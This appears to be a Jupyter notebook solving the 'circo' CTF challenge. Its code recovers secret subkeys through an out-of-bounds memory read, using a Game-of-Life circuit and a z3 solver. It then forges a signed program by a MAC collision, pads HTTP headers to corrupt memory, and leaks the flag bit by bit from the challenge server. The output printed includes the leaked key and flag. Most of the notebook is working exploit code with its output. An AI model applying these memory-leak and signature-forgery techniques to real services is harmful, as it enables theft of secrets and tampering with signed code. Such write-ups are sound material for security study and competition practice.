In [ ]:
# !pip3 install PySocks

In [26]:
import urllib.request
import socks
import socket

SOCKS5_PROXY_HOST = 'localhost'
SOCKS5_PROXY_PORT = 1080

socks.set_default_proxy(socks.SOCKS5, SOCKS5_PROXY_HOST, SOCKS5_PROXY_PORT)
socket.socket = socks.socksocket

ModuleNotFoundError: No module named 'socks'

In [ ]:
import math

def address_to_coordinates(addr):
    if addr == 0:
        return (0, 0)

    layer = int((math.isqrt(addr) + 1) // 2)

    addr -= (2 * layer - 1) ** 2 - 1

    if addr <= 2 * layer:
        return (layer, addr - layer)
    elif addr <= 4 * layer:
        return (3 * layer - addr, layer)
    elif addr <= 6 * layer:
        return (-layer, 5 * layer - addr)
    else:
        return (addr - 7 * layer, -layer)

def coordinates_to_address(x, y):
    if x == 0 and y == 0:
        return 0

    layer = max(abs(x), abs(y))

    addr = (2 * layer - 1) ** 2 - 1

    if y == -layer:
        addr += 7 * layer + x
    elif x == -layer:
        addr += 5 * layer - y
    elif y == layer:
        addr += 3 * layer - x
    elif x == layer:
        addr += layer + y

    return addr

def offset_to_address(addr, offset):
    (x, y) = address_to_coordinates(addr)
    (dx, dy) = address_to_coordinates(offset)
    return coordinates_to_address(x + dx, y + dy)

def get_bit(program, idx, default=0):
  byte_idx = idx >> 3
  bit_idx = idx & 7
  if byte_idx >= len(program):
    return default
  return (program[byte_idx] >> bit_idx) & 1

def set_bit(program, idx, val):
  byte_idx = idx >> 3
  bit_idx = idx & 7
  mask = (~(1 << bit_idx)) & 255
  if byte_idx <= len(program):
    program[byte_idx] &= mask | (val << bit_idx)
    program[byte_idx] |= val << bit_idx


In [ ]:
import urllib.request
import struct

def get_program_bytes(circo_url, circuit, program, input_size, output_size, headers=None):
    if not headers:
        headers = {}

    try:
        with open(circuit, "rb" ) as file:
            prog = file.read()
            prog += struct.pack("<H", input_size)
            prog += program

        headers["Range"] = "bytes=0-" + str(output_size)
        req = urllib.request.Request(circo_url, data=prog, headers=headers, method='POST')
        with urllib.request.urlopen(req) as response:
            assert response.getcode() == 206
            out = response.read()
            if out != b"ERROR\n" and out != b"":
                return out
            else:
                raise Exception("Response was ERROR")
    except Exception as e:
        # print("An error has occurred.")
        # print(e)
        raise e


In [ ]:
# PARAMS

circo_url = "http://circo.2025.ctfcompetition.com:1337/circo.circo"
# circo_url = "http://localhost:49153/circo.circo"
program = b"\x10\x00\x00\x10\xaa\xaa\xaa\xFF"
program += (b"\x00"*(256-len(program)))

In [ ]:
#!pip3 install z3-solver

In [ ]:
from z3 import Solver, BitVec, sat, Or, And, Sum
import sys

def get_one_cycle(program, size):
    return get_program_bytes(circo_url, "challenge/signed_gol.prg", program, size, size)

def get_oob_bit(oob, bitIdx):
    if bitIdx > oob.size():
        raise Exception("search range too small", bitIdx)
    if bitIdx < 0:
        raise Exception("bitIdx too small", bitIdx)
    return (oob >> (bitIdx)) & 1

def get_neighbor_or_constant(program, base, offset, oob, oob_shift):
    neighbor_addr = offset_to_address(base, offset)
    canary = {}
    res = get_bit(program, neighbor_addr, canary)
    if res == canary:
        return get_oob_bit(oob, neighbor_addr - oob_shift)
    return res

def compare_one_cycle(before, size, oob):
    oob_shift = len(before) * 8
    after = get_one_cycle(before, size)
    conditions = []
    for addr in range(len(before) * 8):
        was_alive = get_bit(before, addr)
        is_alive = get_bit(after, addr)
        neighbor_sum = Sum([
            get_neighbor_or_constant(before, addr, offset, oob, oob_shift) for offset in range(1, 9)
        ])
        if was_alive:
            if is_alive:
                conditions.append(Or([neighbor_sum == 2, neighbor_sum == 3]))
            else:
                conditions.append(And([neighbor_sum != 2, neighbor_sum != 3]))
        else:
            if is_alive:
                conditions.append(neighbor_sum == 3)
            else:
                conditions.append(neighbor_sum != 3)
    return conditions

def read_memory(search_range, offset=0, max_solutions=2, extra_checks=False):
    oob = BitVec('oob', search_range * 8)
    conditions = []
    for shift in range(1, (((search_range * 8 // 4) - 1) ** 2) // 8):
        alloc_size = offset + shift
        data_size = shift
        if extra_checks:
            conditions += compare_one_cycle(b"\x00" * data_size, alloc_size, oob)
            conditions += compare_one_cycle(b"\xFF" * data_size, alloc_size, oob)
        conditions += compare_one_cycle(b"\x55" * data_size, alloc_size, oob)
        conditions += compare_one_cycle(b"\xAA" * data_size, alloc_size, oob)

    s = Solver()
    s.add(conditions)
    solutions = []
    while s.check() == sat:
        model = s.model()
        res = model.evaluate(oob).as_long()
        bytestr = res.to_bytes((res.bit_length() + 7)//8)[::-1]
        bytestr += b"\x00" * (search_range - len(bytestr))
        solutions.append(bytestr)
        if len(solutions) >= max_solutions:
            break
        s.add(Or([
            get_oob_bit(oob, idx) != get_oob_bit(model[oob], idx)
            for idx in range(search_range * 8)
        ]))

    return solutions


def read_correct_memory(*args, **kwargs):
    sols = read_memory(*args, **kwargs)
    if len(sols) != 1:
        raise Exception("Expected one solution, got %d" % len(sols))
    return sols[0]


In [ ]:
import binascii

def get_subkeys():
    subkeys = b""
    SECRET_OFFSET = 0x120
    SECRET_OFFSET_END = 0x100
    STEP = 8

    for off in range(SECRET_OFFSET, SECRET_OFFSET_END, -STEP):
        buff = None
        try:
            buff = read_correct_memory(STEP, off, extra_checks=False)
        except Exception as e:
            buff = read_correct_memory(STEP, off, extra_checks=True)
        subkeys += buff
    
    return subkeys

subkeys = get_subkeys()
binascii.hexlify(subkeys)

b'5c98cab37fcf90aa1ee20702bd820c25ae4c6559bfe7c8550f7103815ec10651'

In [ ]:
def program_collision():
    k1 = subkeys[16:]
    k2 = subkeys[:16]
    final = []

    with open("challenge/signed_gol.prg", "rb") as f:
        signed_prog = f.read()
        prog = signed_prog[2:-130]
        last_block_index = 16*(len(prog)//16)

        final += [int(x) for x in prog[:last_block_index]]
        final += [0 for _ in range(16)]

        for i in range(16):
            offset = last_block_index + i
            if offset < len(prog):
                final[offset] = prog[offset]

            final[offset] ^= k1[i] ^ k2[i]

        final[len(prog)] ^= 0x80
        return struct.pack("<H", len(final)) + bytes(final) + signed_prog[-130:]
    raise

collision = bytes(program_collision())
with open("colision_gol.prg", "wb") as f:
    f.write(collision)


In [ ]:
def brute_error(padding):
  max_header_size = 8190
  headers = {}
  while padding > (max_header_size - 2 - 8 - 1):
    header_name = str(padding).zfill(min(padding, max_header_size - 3)) # 3 is for ": x"
    headers[header_name] = "x"
    padding -= len(header_name) + 2 + 8 + 1 # 2 is for "=x" and 8 is for the pointer and 1 for the separator
  headers["x"] = "x" * (padding - 2)
  program = [0x0] * 1638
  set_bit(program, 5735, 1)
  set_bit(program, offset_to_address(5735, 0x58e5), 1)
  get_program_bytes(circo_url, "colision_gol.prg", bytes(program), 3000 - 2, (math.isqrt(5735 // 8) + 1) ** 2, headers=headers)

for padding in range(0xb9f46):
  if padding % 100 == 0:
    print(padding, hex(padding))
  try:
    brute_error(padding)
    print("NO ERROR", padding)
    break
  except Exception as e:
    pass

0 0x0
100 0x64
200 0xc8
300 0x12c
400 0x190
500 0x1f4
NO ERROR 586


In [ ]:
import statistics

def leak_bit(byte_offset, bit_offset):
  REAL_SIZE = 1638
  STEAL_OFFSET = 5735 + bit_offset
  REAL_SIZE = (math.isqrt(STEAL_OFFSET // 8) + 1) ** 2
  CLAIMED_SIZE = 3000 - 2 - byte_offset

  program = [0x0] * REAL_SIZE
  set_bit(program, STEAL_OFFSET, 1)
  set_bit(program, offset_to_address(STEAL_OFFSET, 0x58e5), 1)

  padding = 586
  # padding = 532
  max_header_size = 8190
  headers = {}
  while padding > (max_header_size - 2 - 8 - 1):
    header_name = str(padding).zfill(min(padding, max_header_size - 3)) # 3 is for ": x"
    headers[header_name] = "x"
    padding -= len(header_name) + 2 + 8 + 1 # 2 is for "=x" and 8 is for the pointer and 1 for the separator
  headers["x"] = "x" * (padding - 2)

  try:
    collision_circuit = "colision_gol.prg"
    out = get_program_bytes(circo_url, collision_circuit, bytes(program), CLAIMED_SIZE, REAL_SIZE, headers=headers)
  except Exception as e:
    print("error: ", e)
    return leak_bit(byte_offset, bit_offset)
  return get_bit(out, STEAL_OFFSET)

def leak_bytes():
  leak_start = 0x4b0 // 8 # main.final
  leak_end = leak_start + 4
  for q in range(leak_start, leak_end):
    print(hex(q * 8), end=": ")
    cur_qword = 0
    for x in range(8):
      for y in range(8):
        bits = []
        for z in range(1):
          bits.append(leak_bit(q*8 + x, y))
        cur_bit = 1 - int(statistics.mode(bits))
        cur_qword += cur_bit * pow(2, x * 8 + y)
        print(cur_bit, end="")
      print(" ", end="")
    print(hex(cur_qword), cur_qword.to_bytes((cur_qword.bit_length() + 7) // 8, 'little').decode('ascii'))

leak_bytes()

0x4b0: 00000000 11110100 10110110 10000110 10010110 01110110 01110100 01100110 0x662e6e69616d2f00  /main.f
0x4b8: 10010110 01110110 10000110 00110110 00000000 11000010 00101010 01100010 0x465443006c616e69 inal CTF
0x4c0: 11011110 01101100 10101010 10001100 11010110 00001100 00010110 01010010 0x4a68306b3155367b {6U1k0hJ
0x4c8: 10100110 00101110 01001110 10110010 10111110 00000000 00010010 00101010 0x5448007d4d727465 etrM} HT
